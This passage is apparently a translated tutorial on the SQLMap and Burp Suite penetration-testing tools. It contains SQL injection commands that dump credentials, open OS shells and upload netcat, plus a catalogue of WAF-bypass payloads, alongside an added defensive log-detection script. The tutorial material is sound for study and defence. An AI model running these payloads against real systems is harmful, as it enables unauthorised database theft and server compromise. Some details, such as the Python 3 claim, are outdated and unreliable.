Commonly used penetration testing tools

SQLMap

1. Introduction to SQLMap

SQLMap is an automated SQL injection tool. Its main function is to scan for, discover and exploit SQL injection vulnerabilities in a given URL. It ships with many bypass plug-ins (tamper scripts). The supported databases are MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB. SQLMap uses the following five SQL injection techniques.

● Boolean-based blind injection: the truth of an injected condition is inferred from differences in the returned page.

● Time-based blind injection: nothing can be inferred from the page content, so a conditional time-delay statement is injected and whether it executed is judged from the increase in response time.

● Error-based injection: the page returns database error messages, or the result of the injected statement is returned directly in the page.

● UNION query injection: used when a UNION can be appended to the original query.

● Stacked query injection: used when multiple statements can be executed at once.

SQLMap's features include database fingerprinting, database enumeration, data extraction, access to the target file system and, given sufficient privileges, execution of arbitrary operating system commands. When conventional injection tools cannot exploit a SQL injection vulnerability, SQLMap often still succeeds.

2.Install SQLMap

SQLMap requires a Python environment (Python 3 is not supported). Python 2.7.3 is used here. Download the installer from the official website and install it with one click. After the installation completes, copy the Python installation directory path and add it to the PATH environment variable, as shown below:

Then download the latest version of SQLMap from its official website (http://www.sqlmap.org), unpack it into the Python installation directory and add the SQLMap directory to the environment variable as well. Open cmd and enter the sqlmap.py command; if the tool runs normally the installation succeeded, as shown in the following figure:

3. Getting started with SQLMap

1. Determine whether there is injection

Assume that the target injection point is http://192.168.1.104/sql1/Less-1/?id=11. The command to test whether the parameter is injectable is as follows:

sqlmap.py -u http://192.168.1.104/sql1/Less-1/?id=1

The results show that there is an injection, as shown in the image below:

When the URL contains two or more parameters, it must be wrapped in double quotes (otherwise the shell interprets the & character), as shown below.

sqlmap.py -u "http://192.168.1.104/sql1/Less-1/?id=1&uid=2"

After running the command to test for injection, a large amount of output appears. Let's analyse what it tells us. There are three prompts: the first says the back-end DBMS appears to be MySQL and asks whether to skip the payloads for other DBMSes; the second asks whether to include all tests for MySQL beyond the provided level (1) and risk (1); the third says the GET parameter id is vulnerable and asks whether to keep testing the other parameters. Generally you just press Enter to accept the defaults, as shown in the following figure:

2. Determine whether there is injection in a request saved to a file

Load the HTTP request from a file. SQLMap can read a complete HTTP request from a text file, so cookies, POST data and other headers do not have to be passed as separate options. The content of the txt file is a raw web request, as shown in the following figure:

The command to test for injection uses the -r option to load this file; the result after running is shown in the figure below. -r is typically used when the injection is in a cookie.

3. Query all databases under the current user

After confirming that the website is injectable, this command queries all databases accessible to the current user. If the current user has permission to read the table that holds the list of all databases, the command lists them, as shown below:

sqlmap.py -u http://192.168.1.104/sql1/Less-1/?id=1 --dbs

As the picture below shows, 17 databases were found and their names listed. When continuing the injection, --dbs is replaced with -D xxx, which restricts further queries to the database xxx.

4. Get the table name in the database

After the database names have been obtained, this command queries all table names in the specified database, as shown below. If the -D parameter is omitted, SQLMap lists the tables of every database:

sqlmap.py -u "http://192.168.1.7/sql/union.php?id=1" -D dkeye --tables

The picture above shows the three table names in the dkeye database. When continuing the injection, --tables is replaced with -T <table>, which restricts further queries to that table.

5. Get the field names in the table

After the table names have been obtained, this command queries all column (field) names in the table, as shown below. The result of running it is as follows:

sqlmap.py -u "http://192.168.1.7/sql/union.php?id=1" -D dkeye -T user_info --columns

As the picture above shows, the user_info table in the dkeye database has 4 columns. In subsequent steps, --columns is replaced with -C <columns>.

6. Get field content

After the column names have been obtained, this command dumps the data stored in the chosen columns, as shown below:

sqlmap.py -u "http://192.168.1.7/sql/union.php?id=1" -D dkeye -T user_info -C username,password --dump

Here the username and password values in the user_info table of the dkeye database are downloaded, as shown in the following figure:

7. Get all users of the database

This command lists all users of the database, as shown below. If the current user has permission to read the table that holds all user accounts, the command lists every database user:

sqlmap.py -u "http://192.168.1.7/sql/union.php?id=1" --users

As the figure below shows, the current user account is root:

8. Get the password of the database user

This command lists the password hashes of the database users, as shown below. If the current user has permission to read the user passwords, SQLMap first lists the users, then their hashes, and attempts to crack them.

sqlmap.py -u "http://192.168.1.7/sql/union.php?id=1" --passwords

As the picture below shows, the password is stored as a MySQL5 hash; the hash can be looked up on www.cmd5.com.

9. Get the name of the current website database

This command lists the database currently used by the website, as shown below.

sqlmap.py -u "http://192.168.1.7/sql/union.php?id=1" --current-db

You can see from the picture below that the database is 'sql'.

10. Get the user name of the current website database

This command lists the database user that the website connects as, as shown below.

sqlmap.py -u "http://192.168.1.7/sql/union.php?id=1" --current-user

As you can see from the picture below, the user is root.

4. SQLMap advanced

1. --level 5: detection level

The --level parameter sets the test level to run. There are 5 levels (1 to 5); it can be omitted, and the default is 1. The payloads SQLMap uses are listed in xml/payloads.xml, and you can add your own in the same format. Level 5 contains the most payloads and automatically tests Cookie, X-Forwarded-For and other header injection points; of course it also runs much slower. The level also decides which injection points are tested: GET and POST data are always tested, HTTP Cookie headers are tested from level 2, and HTTP User-Agent/Referer headers from level 3. In short, when you are not sure which parameter or header is the injection point, a high level value is recommended for thoroughness.

2. --is-dba: Whether the current user has administrative rights

This command checks whether the current database account is a database administrator, as shown below. In this case entering the command returns True, as shown below:

sqlmap.py -u "http://192.168.1.7/sql/union.php?id=1" --is-dba

3. --roles: List database administrator roles

This command shows the roles of database users. If the current user has permission to read the table containing all users, the command lists the roles of each user; the -U parameter selects a single user whose roles you want to see. This option only applies when the back-end database is Oracle. The result in this case is as shown below:

4. --referer: HTTP Referer header

SQLMap can forge the HTTP Referer header in its requests. When --level is set to 3 or above, it will also try to inject into the Referer. Use the --referer option to spoof it, for example --referer http://www.baidu.com.

5. --sql-shell: Run custom SQL statements

This option opens an interactive shell for executing arbitrary SQL statements, as shown below. Assume the statement select * from users limit 0,1 is executed; the result is as shown in the figure below:

sqlmap.py -u "http://192.168.1.7/sql/union.php?id=1" --sql-shell

6. --os-cmd, --os-shell: Run operating system commands

When the database is MySQL, PostgreSQL or Microsoft SQL Server and the current user has permission to use the relevant functions, SQLMap can execute operating system commands. On MySQL and PostgreSQL, SQLMap uploads a binary library containing the user-defined functions sys_exec() and sys_eval(); the two functions it then creates can execute system commands. On Microsoft SQL Server, SQLMap uses the xp_cmdshell stored procedure; if it is disabled (the default in Microsoft SQL Server 2005 and later) SQLMap re-enables it, and if it does not exist it is created automatically.

The --os-shell parameter simulates a real shell in which you enter the commands to execute. When stacked statements cannot be executed (for example, a PHP or ASP application backed by MySQL), INTO OUTFILE can still be used to write a web backdoor into a writable directory. --os-shell supports four languages: ASP, ASP.NET, JSP and PHP (changing these settings requires database administrator rights, that is, --is-dba must return True).

7. --file-read: Read files from the database server

This option reads a file from the database server. When the database is MySQL, PostgreSQL or Microsoft SQL Server and the current user has permission to use the relevant functions, the file read can be text or binary. Taking Microsoft SQL Server 2005 as an example, the usage of the --file-read parameter is as follows.

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \
    --file-read "C:/example.exe" -v 1
[...]
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
C:/example.exe file saved to: '/software/sqlmap/output/192.168.136.129/files/C__example.exe'
[...]
$ ls -l output/192.168.136.129/files/C__example.exe
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe
$ file output/192.168.136.129/files/C__example.exe
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

8. --file-write, --file-dest: Upload files to the database server

This option writes a local file to the server. When the database is MySQL, PostgreSQL or Microsoft SQL Server and the current user has permission to use the relevant functions, the uploaded file can be text or binary. The usage of --file-write and --file-dest with MySQL is as follows.

$ file /software/nc.exe.packed
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit
$ ls -l /software/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \
    "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
[...]
[hh:mm:29] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL >= 5.0.0
[...]
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully
written on the back-end DBMS file system? [Y/n] y
[hh:mm:52] [INFO] retrieved: 31744
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes,
same size as the local file '/software/nc.exe.packed'

5. Bypass scripts (tamper)

By default, SQLMap does not modify the injected data, apart from using the CHAR() function to avoid single quotes. The --tamper parameter applies scripts that modify the payload in order to bypass WAFs and similar devices. Most of the scripts use the re module: they try to evade WAF detection rules by changing the character encoding or spacing of the attack payload. The command is as follows:

sqlmap.py XXXXX --tamper "module name"

Currently, 53 official bypass scripts are provided. The following is the format of a tamper script.

# sqlmap/tamper/escapequotes.py

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    # prefix every single and double quote in the payload with a backslash
    return payload.replace("'", "\\'").replace('"', '\\"')

It is not difficult to see that a minimal tamper script consists of the priority variable and the dependencies and tamper function definitions.

● __priority__ defines the priority of the script, which is used when several tamper scripts are chained.

● The dependencies function declares the scope in which the script applies (or does not apply) and can be empty.

● The tamper(payload, **kwargs) function receives the payload and keyword arguments and returns the modified payload.

The following script, which upper-cases SQL keywords, is another example. It uses a regular expression to find every word in the attack payload and converts those that are SQL keywords (kb.keywords) to uppercase.

import re

from lib.core.data import kb

def tamper(payload, **kwargs):
    retVal = payload
    if payload:
        # find every word and upper-case it if it is a known SQL keyword
        for match in re.finditer(r"[A-Za-z_]+", retVal):
            word = match.group()
            if word.upper() in kb.keywords:
                retVal = retVal.replace(word, word.upper())
    return retVal

In daily use, you may need to test whether a website is protected by a WAF/IDS/IPS; the --identify-waf parameter detects this.

Here are some commonly used tamper scripts.

● apostrophemask.py

Function: Replace the apostrophe with its UTF-8 full-width equivalent; used against filters on single quotes.

The statements before using the script are:

1 AND '1'='1

After using the script, the statement is:

1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

● base64encode.py

Function: Base64-encode the whole payload. The statements before using the script are:

1' AND SLEEP(5)#

After using the script, the statement is:

MScgQU5EIFNMRUVQKDUpIw==

● multiplespaces.py

Function: Add multiple spaces around SQL keywords. The statements before using the script are:

1 UNION SELECT foobar

After using the script, the statement is:

1   UNION    SELECT   foobar

● space2plus.py

Function: Replace spaces with + sign.

The statements before using the script are:

SELECT id FROM users

After using the script, the statement is:

SELECT+id+FROM+users

● nonrecursivereplacement.py

Function: Replace each predefined SQL keyword with a doubled form (for example UNION becomes UNIOUNIONN), so that a filter which strips the keyword once leaves the original behind (suitable for very weak custom filters, such as one that replaces SELECT with an empty string).

The statements before using the script are:

1 UNION SELECT 2--

After using the script, the statement is:

1 UNIOUNIONN SELESELECTCT 2--

● space2randomblank.py

Function: Replace spaces with other valid characters.

The statements before using the script are:

SELECT id FROM users

After using the script, the statement is:

SELECT%0Did%0DFROM%0Ausers

● unionalltounion.py

Function: Replace UNION ALL SELECT with UNION SELECT.

The statements before using the script are:

-1 UNION ALL SELECT

After using the script, the statement is:

-1 UNION SELECT

● securesphere.py

Function: Append a specially crafted string.

The statements before using the script are:

1 AND 1=1

After using the script, the statement is:

1 AND 1=1 and '0having'='0having'

● space2hash.py

Function: Replace spaces with # signs and add a random string and newline character.

The statements before using the script are:

1 AND 9227=9227

After using the script, the statement is:

1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227

● space2mssqlblank.py (MSSQL)

Function: Replace spaces with other blank characters that MSSQL accepts as whitespace.

The statements before using the script are:

SELECT id FROM users

After using the script, the statement is:

SELECT%0Eid%0DFROM%07users

● space2mssqlhash.py

Function: Replace spaces with # signs and add a newline character.

The statements before using the script are:

1 AND 9227=9227

After using the script, the statement is:

1%23%0AAND%23%0A9227=9227

● between.py

Function: Replace the greater than sign (>) with NOT BETWEEN 0 AND, and replace the equal sign (=) with BETWEEN AND.

The statements before using the script are:

1 AND A > B--

After using the script, the statement is:

1 AND A NOT BETWEEN 0 AND B--

The statements before using the script are:

1 AND A = B--

After using the script, the statement is:

1 AND A BETWEEN B AND B--

● percentage.py

Function: Add a % sign in front of each character (ASP accepts this).

The statements before using the script are:

SELECT FIELD FROM TABLE

After using the script, the statement is:

%S%E%L%E%C%T%F%I%E%L%D%F%R%O%M%T%A%B%L%E

● sp_password.py

Function: Append sp_password to the end of the payload so that the DBMS automatically obfuscates the statement in its logs.

The statements before using the script are:

1 AND 9227=9227--

After using the script, the statement is:

1 AND 9227=9227-- sp_password

● charencode.py

Function: URL-encode all characters of the given payload (already-encoded characters are not processed again).

The statements before using the script are:

SELECT FIELD FROM%20TABLE

After using the script, the statement is:

%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

● randomcase.py

Function: Randomize the case.

The statements before using the script are:

INSERT

After using the script, the statement is:

InsERt

● charunicodeencode.py

Function: Unicode-encode the string (%uXXXX form).

The statements before using the script are:

SELECT FIELD%20FROM TABLE

After using the script, the statement is:

%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045

● space2comment.py

Function: Replace spaces with /**/.

The statements before using the script are:

SELECT id FROM users

After using the script, the statement is:

SELECT/**/id/**/FROM/**/users

● equaltolike.py

Function: Replace the equal sign with LIKE.

The statements before using the script are:

SELECT * FROM users WHERE id=1

After using the script, the statement is:

SELECT * FROM users WHERE id LIKE 1

● greatest.py

Function: Bypass filtering of ">" by replacing the greater-than sign with GREATEST.

The statements before using the script are:

1 AND A > B

After using the script, the statement is:

1 AND GREATEST(A, B+1)=A

Database types and versions that passed the test:

● MySQL 4, MySQL 5.0 and MySQL 5.5

● Oracle 10g

● PostgreSQL 8.3, PostgreSQL 8.4 and PostgreSQL 9.0

● ifnull2ifisnull.py

Function: Bypass filtering of IFNULL by replacing IFNULL(A, B) with IF(ISNULL(A), B, A).

The statements before using the script are:

IFNULL(1, 2)

After using the script, the statement is:

IF(ISNULL(1),2,1)

Database types and versions that passed the test: MySQL 5.0 and MySQL 5.5.

● modsecurityversioned.py

Function: Wrap the statement in a MySQL versioned inline comment (used where spaces are filtered).

The statements before using the script are:

1 AND 2>1--

After using the script, the statement is:

1 /*!30874AND 2>1*/--

Database types and versions that passed the test: MySQL 5.0.

● space2mysqlblank.py

Function: Replace spaces with other blank characters (for MySQL).

The statements before using the script are:

SELECT id FROM users

After using the script, the statement is:

SELECT%A0id%0BFROM%0Cusers

Database types and versions that passed the test: MySQL 5.1.

● modsecurityzeroversioned.py

Function: Wrap the statement in a MySQL zero-versioned inline comment (/*!00000*/).

The statements before using the script are:

1 AND 2>1--

After using the script, the statement is:

1 /*!00000AND 2>1*/--

Database types and versions that passed the test: MySQL 5.0.

● space2mysqldash.py

Function: Replace spaces with -- and add a newline character.

The statements before using the script are:

1 AND 9227=9227

After using the script, the statement is:

1--%0AAND--%0A9227=9227

● bluecoat.py

Function: Replace the space after each SQL keyword with a valid random blank character, then replace the equal sign with LIKE.

The statements before using the script are:

SELECT id FROM users where id = 1

After using the script, the statement is:

SELECT%09id FROM%09users WHERE%09id LIKE 1

Database types and versions that passed the test: MySQL 5.1 and SGOS.

● versionedkeywords.py

Function: Comment bypass (wrap SQL keywords in MySQL versioned comments).

The statements before using the script are:

UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58), IFNULL(CAST(CURRENT_USER() AS CHAR), CHAR(32)), CH/**/AR(58,100,114, 117,58))#

After using the script, the statement is:

/*! UNION**! ALL**! SELECT**! NULL*/, /*! NULL*/, CONCAT(CHAR(58,104,116,116,58), IFNULL(CAST(CURRENT_USER()/*! AS**! CHAR*/), CHAR(32)), CHAR(58,100,114,117,58))#

● halfversionedmorekeywords.py

Function: When the database is MySQL, bypass the firewall by adding a MySQL versioned comment before each keyword.

The statements before using the script are:

value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58), IFNULL(CAST(CURRENT_USER() AS CHAR), CHAR(32)), CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa

After using the script, the statement is:

value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58), /*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR), /*!0CHAR(32)), /*!0CHAR(58,97,110,121,58)), /*!0NULL, /*!0NULL#/*!0AND 'QDWa'='QDWa

Database types and versions that passed the test: MySQL 4.0.18 and MySQL 5.0.22.

● space2morehash.py

Function: Replace spaces with # signs and add a random string and newline character.

The statements before using the script are:

1 AND 9227=9227

After using the script, the statement is:

1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227

Database types and versions that passed the test: MySQL 5.1.41.

● apostrophenullencode.py

Function: Replace the single quote with an illegal double-byte Unicode character (null-byte encoding).

The statements before using the script are:

1 AND '1'='1

After using the script, the statement is:

1 AND %00%271%00%27=%00%271

● appendnullbyte.py

Function: Append an encoded null byte character at the end of the payload.

The statements before using the script are:

1 AND 1=1

After using the script, the statement is:

1 AND 1=1%00

● chardoubleencode.py

Function: Double URL-encode all characters of the given payload (already-encoded characters are not processed again).

The statements before using the script are:

SELECT FIELD FROM%20TABLE

After using the script, the statement is:

%2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

● unmagicquotes.py

Function: Replace the single quote with a multibyte combination (%bf%27) and append a generic comment at the end.

The statements before using the script are:

1' AND 1=1

After using the script, the statement is:

1%bf%27--

● randomcomments.py

Function: Split SQL keywords with /**/.

The statements before using the script are:

INSERT

After using the script, the statement is:

IN/**/S/**/ERT

Although the tamper scripts bundled with SQLMap cover many cases, real environments are often more complex and the built-in scripts cannot handle every situation. It is therefore recommended to learn how to use the built-in tamper scripts and, at the same time, to master the rules for writing your own, so that you can work more efficiently in varied real-world environments.
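The tamper scripts listed above change only the encoding or spacing of a payload, not its meaning, so a defender who undoes those transformations before matching can recognise probes of the five injection techniques described at the start of this section with a handful of rules. The following Python is an added example written for this page, not part of sqlmap; the regexes, technique labels, log format, IP address, paths and every value in SAMPLE_LOG are my own constructed assumptions.

```python
import re
from urllib.parse import unquote_to_bytes

# Added example, not part of sqlmap: reverse the tamper encodings listed on this
# page, then match the normalized payload against one rule per injection technique.
# Regexes, labels and the sample log below are constructed assumptions.

def url_decode_once(s):
    """One layer of form decoding: '+' -> space, %XX -> byte. UTF-8 is tried first
    (apostrophemask emits valid UTF-8); Latin-1 fallback keeps stray single bytes
    such as space2mysqlblank's %A0 or unmagicquotes' %bf instead of U+FFFD."""
    raw = unquote_to_bytes(s.replace("+", " "))
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return raw.decode("latin-1")

def normalize(payload):
    """Return the canonical upper-case form of a possibly tampered payload."""
    s = payload
    # charencode, chardoubleencode, space2plus: peel URL-encoding layers until stable
    for _ in range(3):
        decoded = url_decode_once(s)
        if decoded == s:
            break
        s = decoded
    # charunicodeencode: %uXXXX -> character
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    # apostrophemask: full-width apostrophe U+FF07 -> '
    s = s.replace("\uff07", "'")
    # apostrophenullencode, appendnullbyte: NUL bytes carry no SQL meaning
    s = s.replace("\x00", "")
    # unmagicquotes: the high byte glued to a quote (%bf%27) only exists to eat a backslash
    s = re.sub(r"[\x80-\xff]'", "'", s)
    # versionedkeywords, halfversionedmorekeywords, modsecurity*: MySQL executes the
    # text inside /*!NNNNN ... */, so the opener and any dangling closer are whitespace
    s = re.sub(r"/\*!\d*\s*", " ", s)
    # space2comment and ordinary comments act as whitespace (randomcomments' split
    # keywords are deliberately NOT re-joined here)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = s.replace("*/", " ")
    # space2hash, space2morehash, space2mssqlhash, space2mysqldash, sp_password:
    # '#' and '--' comment out the rest of the line
    s = re.sub(r"(#|--)[^\n]*(\n|$)", " ", s)
    # space2randomblank, space2mssqlblank, space2mysqlblank, bluecoat: control
    # characters and NBSP used as separators, collapsed to a single space
    s = re.sub(r"[\x00-\x20\x7f\xa0]+", " ", s)
    # randomcase, uppercase: compare case-insensitively
    return s.strip().upper()

# One pattern per technique from the list at the top of the SQLMap section.
TECHNIQUES = [
    ("stacked queries", re.compile(r";\s*(SELECT|INSERT|UPDATE|DELETE|DROP|EXEC|WAITFOR)\b")),
    ("time-based blind", re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b")),
    ("union query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b")),
    ("error-based", re.compile(r"\b(EXTRACTVALUE|UPDATEXML)\s*\(|\bFLOOR\s*\(\s*RAND\s*\(")),
    ("boolean-based blind",
     re.compile(r"\b(AND|OR)\s+\(?\s*[\w']+\s*(NOT\s+BETWEEN|BETWEEN|LIKE|=|>|<)\s*[\w']+")),
]

def classify(normalized):
    """Names of every technique whose pattern matches the normalized payload."""
    return [name for name, rx in TECHNIQUES if rx.search(normalized)]

# Combined-log-format line: client ident user [time] "METHOD target HTTP/x" ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

def scan_log(text):
    """Return (client, parameter, normalized value, techniques) for flagged requests."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.group(1), m.group(2)
        query = target.partition("?")[2]
        for pair in query.split("&"):
            name, _, value = pair.partition("=")
            norm = normalize(value)
            found = classify(norm)
            if found:
                hits.append((client, name, norm, found))
    return hits

# Constructed sample log lines (hypothetical host and path); each tampered value
# mirrors one of the before/after pairs listed above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /union.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /union.php?id=1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /union.php?id=1%27%20AND%20SleEp%285%29%23 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /union.php?id=-1/**/uNiOn/**/aLl/**/sElEcT/**/1,2,3-- HTTP/1.1" 200 700
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /union.php?id=%2531%2520%2541%254E%2544%2520%2531%253D%2531 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /union.php?id=1;%20WAITFOR%20DELAY%20%270:0:5%27 HTTP/1.1" 200 512
"""
```

Running scan_log over SAMPLE_LOG flags five of the six requests and names the technique each one belongs to; the clean first request is ignored.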

Burp Suite

1. Installation of Burp Suite

Burp Suite is an integrated penetration testing platform that includes many functions that help us efficiently complete penetration tests of web applications.

Burp Suite is written in Java and, thanks to Java's cross-platform nature, is easy to learn and use on any platform. Unlike fully automated testing tools, Burp Suite requires some parameters to be configured manually and some automated processes to be triggered before it starts working.

The Burp Suite executable is a Java jar file; the free version can be downloaded from the official website. The free version has many limitations and lacks many advanced tools; the professional version must be purchased to use them. The main differences between the professional and free versions are as follows:

● Burp Scanner.

● Save and restore workspace.

● Extension tools, such as Target Analyzer, Content Discovery and Task Scheduler.

Burp Suite relies on the JRE at run time, so a Java environment must be installed before it can run. Search for the JDK (for example on Baidu), select the installer and download it. Open the installer and click "Next" to install (the installation path can be changed or left at the default). After the installation completes, open cmd and enter java -version; if version information is returned, the JDK is installed correctly, as shown in the following figure:

Next, configure the environment variables: right-click "Computer", then click "Properties" → "Advanced System Settings" → "Environment Variables", then create a new system variable. Enter "JAVA_HOME" as the "Variable Name" in the pop-up box and the JDK installation path as the "Variable Value", such as "C:\Program Files(x86)\Java\jdk1.8.0_112", and then click the "OK" button.

Find the PATH variable in "System Variables", add "%JAVA_HOME%\bin;" at the front of "Variable Value", and then click the "OK" button.

Find the CLASSPATH variable in "System Variables". If it does not exist, create it, add ".;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar;" at the front of "Variable Value" and click the "OK" button.

Open cmd and enter javac. If a help message is returned, as shown in the figure below, it means that the environment variables have been configured correctly.

The downloaded Burp does not need to be installed; double-click the BurpLoader.jar file to run it, as shown in the figure below:

2. Getting started with Burp Suite

The Burp Suite proxy intercepts all network traffic passing through it, such as client request data and server responses. Burp Suite mainly intercepts HTTP and HTTPS traffic. By acting as a man-in-the-middle, it can inspect and modify the client's requests and the server's responses for security testing.

In daily work the most commonly used web client is the web browser. By configuring the browser's proxy settings we can route its traffic through Burp Suite and process the proxied data there. After Burp Suite starts, the default local proxy port of Burp Proxy is 8080, as shown in the following figure:

Taking Firefox as an example, click "Open Menu" in the upper right corner of the browser, then "Options" → "General" → "Network Proxy" → "Settings" → "Manual proxy configuration", as shown in the figure below. Set the HTTP proxy to 127.0.0.1 and the port to 8080, matching the listener in Burp Proxy.

2.1 Proxy

Burp Proxy is the core of the testing process using Burp. Through the proxy mode, we can intercept, view, and modify all data transmitted between the client and the server.

The interception function of Burp Proxy consists mainly of the Forward, Drop, Interception is on/off and Action buttons in the Intercept tab. Their functions are as follows:

● Forward means sending intercepted data packets or modified data packets to the server.

● Drop means discarding the currently intercepted data packet.

● Interception is on means that the interception function is turned on. After clicking, it changes to Interception is off, which means that the interception function is turned off.

● Click the Action button to further send the data packet to functional components such as Spider, Scanner, Repeater, Intruder, etc. for further testing. It also includes functions such as changing the data packet request method and body encoding.

Open the browser, enter the URL you want to visit and press Enter. The request passes through Burp Proxy and is held there until you click the Forward button. If the Drop button is clicked, the data passed this time is discarded and not processed further.

Once Burp Suite has intercepted traffic between the client and the server, we can view the request body, headers, parameters and other information in its message analysis views. Burp has four views for displaying a packet: Raw, Params, Headers and Hex.

● Raw displays the web request in its raw plain-text form, including the request address, HTTP protocol version, Host header, browser information, acceptable content types (Accept), character set, encoding, cookies and so on; penetration testing of the server side can be performed by manually modifying this information.

● Params mainly displays parameter information requested by the client, including parameters of GET or POST requests and cookie parameters. Penetration testing on the server side can be completed by modifying these request parameters.

● Headers displays the header information in the data packet, displaying the data packet in the form of name and value.

● Hex shows the binary content corresponding to the information in Raw. The request content can be modified in the Hex editor, which is very useful for null-byte (00) truncation, as shown in the following figure:

2.2 Spider

Spider's crawling function helps us understand the structure of the target site. The content crawled by Spider is displayed under Target, as shown in the figure below. The left side of the interface is a host and directory tree; select a branch to view the corresponding requests and responses.

2.3 Decoder

The function of Decoder is relatively simple. It is the encoding, decoding and hash conversion tool that comes with Burp. It can convert the original data into various encoding formats and hash.

The interface of Decoder is shown in the figure below. The input field holds the original data to be encoded/decoded; you can type or paste it directly, or send it via the "Send to Decoder" option in the context menu of other Burp tools. The output field shows the result of encoding/decoding the input. Both fields support two formats: text and Hex. The encoding and decoding options consist of decoding (Decode as), encoding (Encode as) and hashing (Hash), and can be chosen according to the needs of the scenario.

Eight format conversions are currently supported for encoding and decoding: URL, HTML, Base64, ASCII, hexadecimal, octal, binary and GZIP. Hashing supports SHA, SHA-224, SHA-256, SHA-384, SHA-512, MD2 and MD5. More importantly, the same data can be passed through several encoding and decoding conversions in sequence in the Decoder interface.

3. Burp Suite advanced

3.1 Scanner

Burp Scanner is mainly used to automatically detect various vulnerabilities in Web systems. This section introduces the basic usage of Burp Scanner. It may change in actual use, but the general steps are as follows.

First, confirm that Burp Suite starts normally and that the browser proxy is configured. Then go to Burp Proxy, turn off interception, and quickly browse the domains or URL modules that need to be scanned. By default, Burp Scanner then scans the requests passing through the proxy and analyses the request messages to identify whether there are vulnerabilities. When we open Burp Target, the requested URL tree is also displayed in the site map.

Taking a website as the test target, select the link in the site map of Burp Target, right-click the URL and select "Actively scan this host". A filter settings dialog pops up; keep the default options to scan the entire domain, as shown below:

You can also select the link URL on a node in the HTTP history under Proxy and right-click to select Do an active scan to scan, as shown in the following figure:

At this time, Burp Scanner starts scanning. Double-click on the Scanner interface to see the scanning results, as shown in the following figure:

We can also select the part that needs to be analyzed in the scan results and send it to the repeater module for simulation submission analysis and verification, as shown in the following figure:

When the scanner scan is completed, you can right-click the link under the Burp Target site map option, select the "issues" → "Report issues" option, and then export the vulnerability report, as shown in the following figure:

Then save the vulnerability report in html file format, and the result is as shown below:

From the steps above we can see that Burp Scanner has two scanning methods: active scanning and passive scanning.

1. Active Scanning

When using active scanning mode, Burp will send a new request to the application and verify the vulnerability through the payload. Operations in this mode will generate a large amount of request and response data, which directly affects the performance of the server. It is usually used in non-production environments. Active scanning applies to the following two types of vulnerabilities.

● Client-side vulnerabilities, such as XSS, HTTP header injection and open redirection.  
● Server-side vulnerabilities, such as SQL injection, command injection and file path traversal.

For the first type of vulnerability, Burp submits payloads in the input fields during detection and then parses the response data. During detection, Burp modifies the basic request, that is, it changes the parameters according to the characteristics of the vulnerability and simulates human behaviour in order to detect the vulnerability. For the second type, taking SQL injection as an example, the server may return a database error message or may return nothing at all. During detection, Burp uses various techniques to verify that a vulnerability exists, such as inducing time delays, forcing Boolean values, and comparing against fuzzing results, to improve the accuracy of the scan report.

2. Passive Scanning

